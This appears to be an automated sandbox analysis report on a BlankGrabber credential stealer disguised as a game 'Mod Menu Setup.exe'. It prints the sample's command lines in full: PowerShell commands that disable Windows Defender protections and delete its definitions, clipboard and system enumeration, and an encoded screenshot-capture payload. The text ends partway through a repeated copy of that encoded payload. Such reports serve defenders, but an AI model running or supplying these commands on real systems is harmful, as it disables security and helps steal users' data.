Malware Analysis Report

2024-10-16 07:19

Sample ID 240624-1lmb4atbmc
Target Mod Menu Setup.exe
SHA256 dfdcf2fadb2e6614a4ddf5ae74472758603d027e38ddcc5339eabfb96aa9cc79
Tags
blankgrabber evasion execution spyware stealer upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

dfdcf2fadb2e6614a4ddf5ae74472758603d027e38ddcc5339eabfb96aa9cc79

Threat Level: Known bad

The file Mod Menu Setup.exe was found to be: Known bad.

Malicious Activity Summary

blankgrabber evasion execution spyware stealer upx

Blankgrabber family

A stealer written in Python and packaged with Pyinstaller

Deletes Windows Defender Definitions

Command and Scripting Interpreter: PowerShell

UPX packed file

Loads dropped DLL

Reads user/profile data of web browsers

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Enumerates physical storage devices

Detects videocard installed

Enumerates processes with tasklist

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Gathers system information

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-24 21:44

Signatures

A stealer written in Python and packaged with Pyinstaller

Description Indicator Process Target
N/A N/A N/A N/A

Blankgrabber family

blankgrabber

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-24 21:44

Reported

2024-06-24 22:15

Platform

win10-20240404-en

Max time kernel

315s

Max time network

1587s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI33762\rar.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3376 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe
PID 3376 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe
PID 4276 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 1848 wrote to memory of 1532 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1848 wrote to memory of 1532 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4532 wrote to memory of 4148 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4532 wrote to memory of 4148 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4276 wrote to memory of 3812 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 3812 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 4236 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 3812 wrote to memory of 1224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3812 wrote to memory of 1224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3912 wrote to memory of 3880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3912 wrote to memory of 3880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4572 wrote to memory of 1672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4572 wrote to memory of 1672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3416 wrote to memory of 2836 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3416 wrote to memory of 2836 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3000 wrote to memory of 4220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 3000 wrote to memory of 4220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 5100 wrote to memory of 4248 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5100 wrote to memory of 4248 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4236 wrote to memory of 4036 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4236 wrote to memory of 4036 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4276 wrote to memory of 3576 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 3576 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4532 wrote to memory of 4224 N/A C:\Windows\system32\cmd.exe C:\Program Files\Windows Defender\MpCmdRun.exe
PID 4532 wrote to memory of 4224 N/A C:\Windows\system32\cmd.exe C:\Program Files\Windows Defender\MpCmdRun.exe
PID 3576 wrote to memory of 2344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3576 wrote to memory of 2344 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4276 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 2604 wrote to memory of 404 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 2604 wrote to memory of 404 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4276 wrote to memory of 3700 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 3700 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4036 wrote to memory of 4504 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4036 wrote to memory of 4504 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3700 wrote to memory of 4964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3700 wrote to memory of 4964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4276 wrote to memory of 3200 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 3200 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 3200 wrote to memory of 5068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 3200 wrote to memory of 5068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4276 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 4276 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe C:\Windows\system32\cmd.exe
PID 1856 wrote to memory of 4312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 1856 wrote to memory of 4312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4504 wrote to memory of 220 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4504 wrote to memory of 220 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe"

C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Mod Menu Setup.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAg